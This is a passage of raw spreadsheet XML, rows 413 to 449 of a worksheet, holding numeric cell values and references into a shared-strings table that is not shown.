      <c r="E413" s="6">
        <v>404</v>
      </c>
      <c r="F413" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G413" s="6">
        <v>743</v>
      </c>
      <c r="H413" s="6">
        <v>378</v>
      </c>
      <c r="I413" s="6">
        <v>0</v>
      </c>
      <c r="J413" s="6">
        <v>331</v>
      </c>
      <c r="K413" s="6">
        <v>69134</v>
      </c>
      <c r="L413" s="11"/>
      <c r="M413" s="11"/>
      <c r="N413" s="11" t="s">
        <v>954</v>
      </c>
    </row>
    <row r="414" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A414" s="3">
        <v>413</v>
      </c>
      <c r="B414" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C414" s="14" t="s">
        <v>955</v>
      </c>
      <c r="D414" s="6">
        <v>1</v>
      </c>
      <c r="E414" s="6">
        <v>503</v>
      </c>
      <c r="F414" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G414" s="6">
        <v>594</v>
      </c>
      <c r="H414" s="6">
        <v>406</v>
      </c>
      <c r="I414" s="6">
        <v>0</v>
      </c>
      <c r="J414" s="6">
        <v>399</v>
      </c>
      <c r="K414" s="6">
        <v>35</v>
      </c>
      <c r="L414" s="11"/>
      <c r="M414" s="11"/>
      <c r="N414" s="11" t="s">
        <v>956</v>
      </c>
    </row>
    <row r="415" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A415" s="3">
        <v>414</v>
      </c>
      <c r="B415" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C415" s="14" t="s">
        <v>957</v>
      </c>
      <c r="D415" s="6">
        <v>1</v>
      </c>
      <c r="E415" s="6">
        <v>503</v>
      </c>
      <c r="F415" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G415" s="6">
        <v>575</v>
      </c>
      <c r="H415" s="6">
        <v>411</v>
      </c>
      <c r="I415" s="6">
        <v>0</v>
      </c>
      <c r="J415" s="6">
        <v>399</v>
      </c>
      <c r="K415" s="6">
        <v>35</v>
      </c>
      <c r="L415" s="11"/>
      <c r="M415" s="11"/>
      <c r="N415" s="11" t="s">
        <v>958</v>
      </c>
    </row>
    <row r="416" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A416" s="3">
        <v>415</v>
      </c>
      <c r="B416" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C416" s="14" t="s">
        <v>959</v>
      </c>
      <c r="D416" s="6">
        <v>1</v>
      </c>
      <c r="E416" s="6">
        <v>503</v>
      </c>
      <c r="F416" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G416" s="6">
        <v>568</v>
      </c>
      <c r="H416" s="6">
        <v>416</v>
      </c>
      <c r="I416" s="6">
        <v>0</v>
      </c>
      <c r="J416" s="6">
        <v>399</v>
      </c>
      <c r="K416" s="6">
        <v>35</v>
      </c>
      <c r="L416" s="11"/>
      <c r="M416" s="11"/>
      <c r="N416" s="11" t="s">
        <v>960</v>
      </c>
    </row>
    <row r="417" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A417" s="3">
        <v>416</v>
      </c>
      <c r="B417" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C417" s="14" t="s">
        <v>962</v>
      </c>
      <c r="D417" s="6">
        <v>1</v>
      </c>
      <c r="E417" s="6">
        <v>503</v>
      </c>
      <c r="F417" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G417" s="6">
        <v>473</v>
      </c>
      <c r="H417" s="6">
        <v>421</v>
      </c>
      <c r="I417" s="6">
        <v>0</v>
      </c>
      <c r="J417" s="6">
        <v>399</v>
      </c>
      <c r="K417" s="6">
        <v>35</v>
      </c>
      <c r="L417" s="11"/>
      <c r="M417" s="11"/>
      <c r="N417" s="11" t="s">
        <v>963</v>
      </c>
    </row>
    <row r="418" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A418" s="3">
        <v>417</v>
      </c>
      <c r="B418" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C418" s="14" t="s">
        <v>964</v>
      </c>
      <c r="D418" s="6">
        <v>1</v>
      </c>
      <c r="E418" s="6">
        <v>503</v>
      </c>
      <c r="F418" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G418" s="6">
        <v>416</v>
      </c>
      <c r="H418" s="6">
        <v>426</v>
      </c>
      <c r="I418" s="6">
        <v>0</v>
      </c>
      <c r="J418" s="6">
        <v>399</v>
      </c>
      <c r="K418" s="6">
        <v>35</v>
      </c>
      <c r="L418" s="11"/>
      <c r="M418" s="11"/>
      <c r="N418" s="11" t="s">
        <v>965</v>
      </c>
    </row>
    <row r="419" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A419" s="3">
        <v>418</v>
      </c>
      <c r="B419" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C419" s="14" t="s">
        <v>966</v>
      </c>
      <c r="D419" s="6">
        <v>1</v>
      </c>
      <c r="E419" s="6">
        <v>503</v>
      </c>
      <c r="F419" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G419" s="6">
        <v>438</v>
      </c>
      <c r="H419" s="6">
        <v>431</v>
      </c>
      <c r="I419" s="6">
        <v>0</v>
      </c>
      <c r="J419" s="6">
        <v>399</v>
      </c>
      <c r="K419" s="6">
        <v>35</v>
      </c>
      <c r="L419" s="11"/>
      <c r="M419" s="11"/>
      <c r="N419" s="11" t="s">
        <v>967</v>
      </c>
    </row>
    <row r="420" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A420" s="3">
        <v>419</v>
      </c>
      <c r="B420" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C420" s="14" t="s">
        <v>968</v>
      </c>
      <c r="D420" s="6">
        <v>1</v>
      </c>
      <c r="E420" s="6">
        <v>503</v>
      </c>
      <c r="F420" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G420" s="6">
        <v>437</v>
      </c>
      <c r="H420" s="6">
        <v>436</v>
      </c>
      <c r="I420" s="6">
        <v>0</v>
      </c>
      <c r="J420" s="6">
        <v>399</v>
      </c>
      <c r="K420" s="6">
        <v>35</v>
      </c>
      <c r="L420" s="11"/>
      <c r="M420" s="11"/>
      <c r="N420" s="11" t="s">
        <v>969</v>
      </c>
    </row>
    <row r="421" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A421" s="3">
        <v>420</v>
      </c>
      <c r="B421" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C421" s="14" t="s">
        <v>970</v>
      </c>
      <c r="D421" s="6">
        <v>1</v>
      </c>
      <c r="E421" s="6">
        <v>503</v>
      </c>
      <c r="F421" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G421" s="6">
        <v>428</v>
      </c>
      <c r="H421" s="6">
        <v>441</v>
      </c>
      <c r="I421" s="6">
        <v>0</v>
      </c>
      <c r="J421" s="6">
        <v>399</v>
      </c>
      <c r="K421" s="6">
        <v>35</v>
      </c>
      <c r="L421" s="11"/>
      <c r="M421" s="11"/>
      <c r="N421" s="11" t="s">
        <v>971</v>
      </c>
    </row>
    <row r="422" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A422" s="3">
        <v>421</v>
      </c>
      <c r="B422" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C422" s="14" t="s">
        <v>972</v>
      </c>
      <c r="D422" s="6">
        <v>1</v>
      </c>
      <c r="E422" s="6">
        <v>503</v>
      </c>
      <c r="F422" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G422" s="6">
        <v>428</v>
      </c>
      <c r="H422" s="6">
        <v>446</v>
      </c>
      <c r="I422" s="6">
        <v>0</v>
      </c>
      <c r="J422" s="6">
        <v>399</v>
      </c>
      <c r="K422" s="6">
        <v>35</v>
      </c>
      <c r="L422" s="11"/>
      <c r="M422" s="11"/>
      <c r="N422" s="11" t="s">
        <v>973</v>
      </c>
    </row>
    <row r="423" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A423" s="3">
        <v>422</v>
      </c>
      <c r="B423" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C423" s="14" t="s">
        <v>974</v>
      </c>
      <c r="D423" s="6">
        <v>1</v>
      </c>
      <c r="E423" s="6">
        <v>503</v>
      </c>
      <c r="F423" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G423" s="6">
        <v>449</v>
      </c>
      <c r="H423" s="6">
        <v>451</v>
      </c>
      <c r="I423" s="6">
        <v>0</v>
      </c>
      <c r="J423" s="6">
        <v>399</v>
      </c>
      <c r="K423" s="6">
        <v>35</v>
      </c>
      <c r="L423" s="11"/>
      <c r="M423" s="11"/>
      <c r="N423" s="11" t="s">
        <v>975</v>
      </c>
    </row>
    <row r="424" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A424" s="3">
        <v>423</v>
      </c>
      <c r="B424" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C424" s="14" t="s">
        <v>976</v>
      </c>
      <c r="D424" s="6">
        <v>1</v>
      </c>
      <c r="E424" s="6">
        <v>503</v>
      </c>
      <c r="F424" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G424" s="6">
        <v>465</v>
      </c>
      <c r="H424" s="6">
        <v>456</v>
      </c>
      <c r="I424" s="6">
        <v>0</v>
      </c>
      <c r="J424" s="6">
        <v>399</v>
      </c>
      <c r="K424" s="6">
        <v>35</v>
      </c>
      <c r="L424" s="11"/>
      <c r="M424" s="11"/>
      <c r="N424" s="11" t="s">
        <v>977</v>
      </c>
    </row>
    <row r="425" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A425" s="3">
        <v>424</v>
      </c>
      <c r="B425" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C425" s="14" t="s">
        <v>978</v>
      </c>
      <c r="D425" s="6">
        <v>1</v>
      </c>
      <c r="E425" s="6">
        <v>503</v>
      </c>
      <c r="F425" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G425" s="6">
        <v>472</v>
      </c>
      <c r="H425" s="6">
        <v>461</v>
      </c>
      <c r="I425" s="6">
        <v>0</v>
      </c>
      <c r="J425" s="6">
        <v>399</v>
      </c>
      <c r="K425" s="6">
        <v>35</v>
      </c>
      <c r="L425" s="11"/>
      <c r="M425" s="11"/>
      <c r="N425" s="11" t="s">
        <v>979</v>
      </c>
    </row>
    <row r="426" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A426" s="3">
        <v>425</v>
      </c>
      <c r="B426" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C426" s="14" t="s">
        <v>980</v>
      </c>
      <c r="D426" s="6">
        <v>1</v>
      </c>
      <c r="E426" s="6">
        <v>503</v>
      </c>
      <c r="F426" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G426" s="6">
        <v>555</v>
      </c>
      <c r="H426" s="6">
        <v>466</v>
      </c>
      <c r="I426" s="6">
        <v>0</v>
      </c>
      <c r="J426" s="6">
        <v>399</v>
      </c>
      <c r="K426" s="6">
        <v>35</v>
      </c>
      <c r="L426" s="11"/>
      <c r="M426" s="11"/>
      <c r="N426" s="11" t="s">
        <v>981</v>
      </c>
    </row>
    <row r="427" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A427" s="3">
        <v>426</v>
      </c>
      <c r="B427" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C427" s="14" t="s">
        <v>983</v>
      </c>
      <c r="D427" s="6">
        <v>1</v>
      </c>
      <c r="E427" s="6">
        <v>503</v>
      </c>
      <c r="F427" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G427" s="6">
        <v>578</v>
      </c>
      <c r="H427" s="6">
        <v>471</v>
      </c>
      <c r="I427" s="6">
        <v>0</v>
      </c>
      <c r="J427" s="6">
        <v>399</v>
      </c>
      <c r="K427" s="6">
        <v>35</v>
      </c>
      <c r="L427" s="11"/>
      <c r="M427" s="11"/>
      <c r="N427" s="11" t="s">
        <v>984</v>
      </c>
    </row>
    <row r="428" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A428" s="3">
        <v>427</v>
      </c>
      <c r="B428" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C428" s="14" t="s">
        <v>985</v>
      </c>
      <c r="D428" s="6">
        <v>1</v>
      </c>
      <c r="E428" s="6">
        <v>503</v>
      </c>
      <c r="F428" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G428" s="6">
        <v>659</v>
      </c>
      <c r="H428" s="6">
        <v>476</v>
      </c>
      <c r="I428" s="6">
        <v>0</v>
      </c>
      <c r="J428" s="6">
        <v>399</v>
      </c>
      <c r="K428" s="6">
        <v>35</v>
      </c>
      <c r="L428" s="11"/>
      <c r="M428" s="11"/>
      <c r="N428" s="11" t="s">
        <v>986</v>
      </c>
    </row>
    <row r="429" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A429" s="3">
        <v>428</v>
      </c>
      <c r="B429" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C429" s="14" t="s">
        <v>987</v>
      </c>
      <c r="D429" s="6">
        <v>1</v>
      </c>
      <c r="E429" s="6">
        <v>503</v>
      </c>
      <c r="F429" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G429" s="6">
        <v>663</v>
      </c>
      <c r="H429" s="6">
        <v>481</v>
      </c>
      <c r="I429" s="6">
        <v>0</v>
      </c>
      <c r="J429" s="6">
        <v>399</v>
      </c>
      <c r="K429" s="6">
        <v>35</v>
      </c>
      <c r="L429" s="11"/>
      <c r="M429" s="11"/>
      <c r="N429" s="11" t="s">
        <v>988</v>
      </c>
    </row>
    <row r="430" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A430" s="3">
        <v>429</v>
      </c>
      <c r="B430" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C430" s="14" t="s">
        <v>989</v>
      </c>
      <c r="D430" s="6">
        <v>1</v>
      </c>
      <c r="E430" s="6">
        <v>503</v>
      </c>
      <c r="F430" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G430" s="6">
        <v>649</v>
      </c>
      <c r="H430" s="6">
        <v>486</v>
      </c>
      <c r="I430" s="6">
        <v>0</v>
      </c>
      <c r="J430" s="6">
        <v>399</v>
      </c>
      <c r="K430" s="6">
        <v>35</v>
      </c>
      <c r="L430" s="11"/>
      <c r="M430" s="11"/>
      <c r="N430" s="11" t="s">
        <v>990</v>
      </c>
    </row>
    <row r="431" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A431" s="3">
        <v>430</v>
      </c>
      <c r="B431" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C431" s="14" t="s">
        <v>991</v>
      </c>
      <c r="D431" s="6">
        <v>1</v>
      </c>
      <c r="E431" s="6">
        <v>503</v>
      </c>
      <c r="F431" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G431" s="6">
        <v>553</v>
      </c>
      <c r="H431" s="6">
        <v>491</v>
      </c>
      <c r="I431" s="6">
        <v>0</v>
      </c>
      <c r="J431" s="6">
        <v>399</v>
      </c>
      <c r="K431" s="6">
        <v>35</v>
      </c>
      <c r="L431" s="11"/>
      <c r="M431" s="11"/>
      <c r="N431" s="11" t="s">
        <v>992</v>
      </c>
    </row>
    <row r="432" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A432" s="3">
        <v>431</v>
      </c>
      <c r="B432" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C432" s="14" t="s">
        <v>993</v>
      </c>
      <c r="D432" s="6">
        <v>1</v>
      </c>
      <c r="E432" s="6">
        <v>503</v>
      </c>
      <c r="F432" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G432" s="6">
        <v>540</v>
      </c>
      <c r="H432" s="6">
        <v>496</v>
      </c>
      <c r="I432" s="6">
        <v>0</v>
      </c>
      <c r="J432" s="6">
        <v>399</v>
      </c>
      <c r="K432" s="6">
        <v>35</v>
      </c>
      <c r="L432" s="11"/>
      <c r="M432" s="11"/>
      <c r="N432" s="11" t="s">
        <v>994</v>
      </c>
    </row>
    <row r="433" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A433" s="3">
        <v>432</v>
      </c>
      <c r="B433" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C433" s="14" t="s">
        <v>995</v>
      </c>
      <c r="D433" s="6">
        <v>1</v>
      </c>
      <c r="E433" s="6">
        <v>503</v>
      </c>
      <c r="F433" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G433" s="6">
        <v>485</v>
      </c>
      <c r="H433" s="6">
        <v>501</v>
      </c>
      <c r="I433" s="6">
        <v>0</v>
      </c>
      <c r="J433" s="6">
        <v>399</v>
      </c>
      <c r="K433" s="6">
        <v>35</v>
      </c>
      <c r="L433" s="11"/>
      <c r="M433" s="11"/>
      <c r="N433" s="11" t="s">
        <v>996</v>
      </c>
    </row>
    <row r="434" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A434" s="3">
        <v>433</v>
      </c>
      <c r="B434" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C434" s="14" t="s">
        <v>997</v>
      </c>
      <c r="D434" s="6">
        <v>1</v>
      </c>
      <c r="E434" s="6">
        <v>503</v>
      </c>
      <c r="F434" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G434" s="6">
        <v>476</v>
      </c>
      <c r="H434" s="6">
        <v>506</v>
      </c>
      <c r="I434" s="6">
        <v>0</v>
      </c>
      <c r="J434" s="6">
        <v>399</v>
      </c>
      <c r="K434" s="6">
        <v>35</v>
      </c>
      <c r="L434" s="11"/>
      <c r="M434" s="11"/>
      <c r="N434" s="11" t="s">
        <v>998</v>
      </c>
    </row>
    <row r="435" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A435" s="3">
        <v>434</v>
      </c>
      <c r="B435" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C435" s="14" t="s">
        <v>1000</v>
      </c>
      <c r="D435" s="6">
        <v>1</v>
      </c>
      <c r="E435" s="6">
        <v>503</v>
      </c>
      <c r="F435" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G435" s="6">
        <v>488</v>
      </c>
      <c r="H435" s="6">
        <v>511</v>
      </c>
      <c r="I435" s="6">
        <v>0</v>
      </c>
      <c r="J435" s="6">
        <v>399</v>
      </c>
      <c r="K435" s="6">
        <v>35</v>
      </c>
      <c r="L435" s="11"/>
      <c r="M435" s="11"/>
      <c r="N435" s="11" t="s">
        <v>1001</v>
      </c>
    </row>
    <row r="436" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A436" s="3">
        <v>435</v>
      </c>
      <c r="B436" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C436" s="14" t="s">
        <v>1002</v>
      </c>
      <c r="D436" s="6">
        <v>1</v>
      </c>
      <c r="E436" s="6">
        <v>503</v>
      </c>
      <c r="F436" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G436" s="6">
        <v>481</v>
      </c>
      <c r="H436" s="6">
        <v>516</v>
      </c>
      <c r="I436" s="6">
        <v>0</v>
      </c>
      <c r="J436" s="6">
        <v>399</v>
      </c>
      <c r="K436" s="6">
        <v>35</v>
      </c>
      <c r="L436" s="11"/>
      <c r="M436" s="11"/>
      <c r="N436" s="11" t="s">
        <v>1003</v>
      </c>
    </row>
    <row r="437" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A437" s="3">
        <v>436</v>
      </c>
      <c r="B437" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C437" s="14" t="s">
        <v>1004</v>
      </c>
      <c r="D437" s="6">
        <v>1</v>
      </c>
      <c r="E437" s="6">
        <v>503</v>
      </c>
      <c r="F437" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G437" s="6">
        <v>473</v>
      </c>
      <c r="H437" s="6">
        <v>521</v>
      </c>
      <c r="I437" s="6">
        <v>0</v>
      </c>
      <c r="J437" s="6">
        <v>399</v>
      </c>
      <c r="K437" s="6">
        <v>35</v>
      </c>
      <c r="L437" s="11"/>
      <c r="M437" s="11"/>
      <c r="N437" s="11" t="s">
        <v>1005</v>
      </c>
    </row>
    <row r="438" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A438" s="3">
        <v>437</v>
      </c>
      <c r="B438" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C438" s="14" t="s">
        <v>1006</v>
      </c>
      <c r="D438" s="6">
        <v>1</v>
      </c>
      <c r="E438" s="6">
        <v>503</v>
      </c>
      <c r="F438" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G438" s="6">
        <v>430</v>
      </c>
      <c r="H438" s="6">
        <v>526</v>
      </c>
      <c r="I438" s="6">
        <v>0</v>
      </c>
      <c r="J438" s="6">
        <v>399</v>
      </c>
      <c r="K438" s="6">
        <v>35</v>
      </c>
      <c r="L438" s="11"/>
      <c r="M438" s="11"/>
      <c r="N438" s="11" t="s">
        <v>1007</v>
      </c>
    </row>
    <row r="439" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A439" s="3">
        <v>438</v>
      </c>
      <c r="B439" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C439" s="14" t="s">
        <v>1008</v>
      </c>
      <c r="D439" s="6">
        <v>1</v>
      </c>
      <c r="E439" s="6">
        <v>503</v>
      </c>
      <c r="F439" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G439" s="6">
        <v>401</v>
      </c>
      <c r="H439" s="6">
        <v>531</v>
      </c>
      <c r="I439" s="6">
        <v>0</v>
      </c>
      <c r="J439" s="6">
        <v>399</v>
      </c>
      <c r="K439" s="6">
        <v>35</v>
      </c>
      <c r="L439" s="11"/>
      <c r="M439" s="11"/>
      <c r="N439" s="11" t="s">
        <v>1009</v>
      </c>
    </row>
    <row r="440" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A440" s="3">
        <v>439</v>
      </c>
      <c r="B440" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C440" s="14" t="s">
        <v>1010</v>
      </c>
      <c r="D440" s="6">
        <v>1</v>
      </c>
      <c r="E440" s="6">
        <v>404</v>
      </c>
      <c r="F440" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G440" s="6">
        <v>416</v>
      </c>
      <c r="H440" s="6">
        <v>357</v>
      </c>
      <c r="I440" s="6">
        <v>0</v>
      </c>
      <c r="J440" s="6">
        <v>331</v>
      </c>
      <c r="K440" s="6">
        <v>69134</v>
      </c>
      <c r="L440" s="11"/>
      <c r="M440" s="11"/>
      <c r="N440" s="11" t="s">
        <v>1011</v>
      </c>
    </row>
    <row r="441" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A441" s="3">
        <v>440</v>
      </c>
      <c r="B441" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C441" s="14" t="s">
        <v>1012</v>
      </c>
      <c r="D441" s="6">
        <v>1</v>
      </c>
      <c r="E441" s="6">
        <v>404</v>
      </c>
      <c r="F441" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G441" s="6">
        <v>456</v>
      </c>
      <c r="H441" s="6">
        <v>384</v>
      </c>
      <c r="I441" s="6">
        <v>0</v>
      </c>
      <c r="J441" s="6">
        <v>331</v>
      </c>
      <c r="K441" s="6">
        <v>69134</v>
      </c>
      <c r="L441" s="11"/>
      <c r="M441" s="11"/>
      <c r="N441" s="11" t="s">
        <v>1013</v>
      </c>
    </row>
    <row r="442" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A442" s="3">
        <v>441</v>
      </c>
      <c r="B442" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C442" s="14" t="s">
        <v>1014</v>
      </c>
      <c r="D442" s="6">
        <v>1</v>
      </c>
      <c r="E442" s="6">
        <v>404</v>
      </c>
      <c r="F442" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G442" s="6">
        <v>468</v>
      </c>
      <c r="H442" s="6">
        <v>393</v>
      </c>
      <c r="I442" s="6">
        <v>0</v>
      </c>
      <c r="J442" s="6">
        <v>331</v>
      </c>
      <c r="K442" s="6">
        <v>69134</v>
      </c>
      <c r="L442" s="11"/>
      <c r="M442" s="11"/>
      <c r="N442" s="11" t="s">
        <v>1015</v>
      </c>
    </row>
    <row r="443" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A443" s="3">
        <v>442</v>
      </c>
      <c r="B443" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C443" s="14" t="s">
        <v>1016</v>
      </c>
      <c r="D443" s="6">
        <v>1</v>
      </c>
      <c r="E443" s="6">
        <v>404</v>
      </c>
      <c r="F443" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G443" s="6">
        <v>480</v>
      </c>
      <c r="H443" s="6">
        <v>402</v>
      </c>
      <c r="I443" s="6">
        <v>0</v>
      </c>
      <c r="J443" s="6">
        <v>331</v>
      </c>
      <c r="K443" s="6">
        <v>69134</v>
      </c>
      <c r="L443" s="11"/>
      <c r="M443" s="11"/>
      <c r="N443" s="11" t="s">
        <v>1017</v>
      </c>
    </row>
    <row r="444" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A444" s="3">
        <v>443</v>
      </c>
      <c r="B444" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C444" s="14" t="s">
        <v>1018</v>
      </c>
      <c r="D444" s="6">
        <v>1</v>
      </c>
      <c r="E444" s="6">
        <v>404</v>
      </c>
      <c r="F444" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G444" s="6">
        <v>504</v>
      </c>
      <c r="H444" s="6">
        <v>411</v>
      </c>
      <c r="I444" s="6">
        <v>0</v>
      </c>
      <c r="J444" s="6">
        <v>331</v>
      </c>
      <c r="K444" s="6">
        <v>69134</v>
      </c>
      <c r="L444" s="11"/>
      <c r="M444" s="11"/>
      <c r="N444" s="11" t="s">
        <v>1019</v>
      </c>
    </row>
    <row r="445" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A445" s="3">
        <v>444</v>
      </c>
      <c r="B445" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C445" s="14" t="s">
        <v>1020</v>
      </c>
      <c r="D445" s="6">
        <v>1</v>
      </c>
      <c r="E445" s="6">
        <v>404</v>
      </c>
      <c r="F445" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G445" s="6">
        <v>504</v>
      </c>
      <c r="H445" s="6">
        <v>420</v>
      </c>
      <c r="I445" s="6">
        <v>0</v>
      </c>
      <c r="J445" s="6">
        <v>331</v>
      </c>
      <c r="K445" s="6">
        <v>69134</v>
      </c>
      <c r="L445" s="11"/>
      <c r="M445" s="11"/>
      <c r="N445" s="11" t="s">
        <v>1021</v>
      </c>
    </row>
    <row r="446" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A446" s="3">
        <v>445</v>
      </c>
      <c r="B446" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C446" s="14" t="s">
        <v>1023</v>
      </c>
      <c r="D446" s="6">
        <v>1</v>
      </c>
      <c r="E446" s="6">
        <v>404</v>
      </c>
      <c r="F446" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G446" s="6">
        <v>500</v>
      </c>
      <c r="H446" s="6">
        <v>429</v>
      </c>
      <c r="I446" s="6">
        <v>0</v>
      </c>
      <c r="J446" s="6">
        <v>331</v>
      </c>
      <c r="K446" s="6">
        <v>69134</v>
      </c>
      <c r="L446" s="11"/>
      <c r="M446" s="11"/>
      <c r="N446" s="11" t="s">
        <v>1024</v>
      </c>
    </row>
    <row r="447" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A447" s="3">
        <v>446</v>
      </c>
      <c r="B447" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C447" s="14" t="s">
        <v>1025</v>
      </c>
      <c r="D447" s="6">
        <v>1</v>
      </c>
      <c r="E447" s="6">
        <v>404</v>
      </c>
      <c r="F447" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G447" s="6">
        <v>516</v>
      </c>
      <c r="H447" s="6">
        <v>438</v>
      </c>
      <c r="I447" s="6">
        <v>0</v>
      </c>
      <c r="J447" s="6">
        <v>331</v>
      </c>
      <c r="K447" s="6">
        <v>69134</v>
      </c>
      <c r="L447" s="11"/>
      <c r="M447" s="11"/>
      <c r="N447" s="11" t="s">
        <v>1026</v>
      </c>
    </row>
    <row r="448" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A448" s="3">
        <v>447</v>
      </c>
      <c r="B448" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C448" s="14" t="s">
        <v>1027</v>
      </c>
      <c r="D448" s="6">
        <v>1</v>
      </c>
      <c r="E448" s="6">
        <v>404</v>
      </c>
      <c r="F448" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G448" s="6">
        <v>524</v>
      </c>
      <c r="H448" s="6">
        <v>448</v>
      </c>
      <c r="I448" s="6">
        <v>0</v>
      </c>
      <c r="J448" s="6">
        <v>331</v>
      </c>
      <c r="K448" s="6">
        <v>69134</v>
      </c>
      <c r="L448" s="11"/>
      <c r="M448" s="11"/>
      <c r="N448" s="11" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="449" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A449" s="3">
        <v>448</v>
      </c>
      <c r="B449" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C449" s="14" t="s">
        <v>1029</v>
      </c>
      <c r="D449" s="6">
        <v>1</v>
      </c>
      <c r="E449" s="6">
        <v>404</v>
      </c>
      <c r="F449" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G449" s="6">
        <v>533</v>
      </c>
      <c r="H449" s="6">
        <v>458</v>
      </c>
      <c r="I449" s="6">
        <v>0</v>
      </c>
      <c r="J449" s="6">
        <v>331</v>
      </c>
      <c r="K449" s="6">
        <v>69134</v>
      </c>
